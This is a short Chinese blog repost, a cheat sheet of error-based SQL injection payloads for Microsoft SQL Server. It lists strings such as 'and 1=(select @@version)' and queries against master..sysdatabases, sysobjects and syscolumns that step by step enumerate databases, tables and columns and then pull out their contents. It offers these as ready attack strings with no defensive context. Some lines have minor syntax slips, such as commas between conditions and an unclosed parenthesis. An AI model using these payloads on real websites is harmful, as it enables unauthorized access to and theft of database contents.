码迷,mamicode.com
首页 > 其他好文 > 详细

显性注入代码

时间:2017-09-29 00:10:03      阅读:112      评论:0      收藏:0      [点我收藏+]

标签:显性注入代码

库版本进行查询   and 1=(select @@version)

查看当前库名    and 1=(select db_name() 

库名查询       and 1=(select top 1 name from master..sysdatabases where dbid>4 and name <> ‘第一个数据库库名‘,name <> ‘第二个数据库库名‘,。。。。。。name <> ‘第N个数据库库名’)

表名查询:       and 1=(select top 1 name from sysobjects where xtype=‘u’ and name <> ‘第一个数据库表名‘name <> ‘第二个数据库表名‘,。。。。。。name <> ‘第N个数据库表名’) 

列名查询         and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name=‘表名‘) and name <> ‘第一个列名’,and name <> ‘第二个列名‘。。。。。。and name <> ‘第个列名‘  )

内容查询:       and 1=(select top 1 列名 from 表名) 


显性注入代码

标签:显性注入代码

原文地址:http://dongxiaoyang.blog.51cto.com/12624314/1969576

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!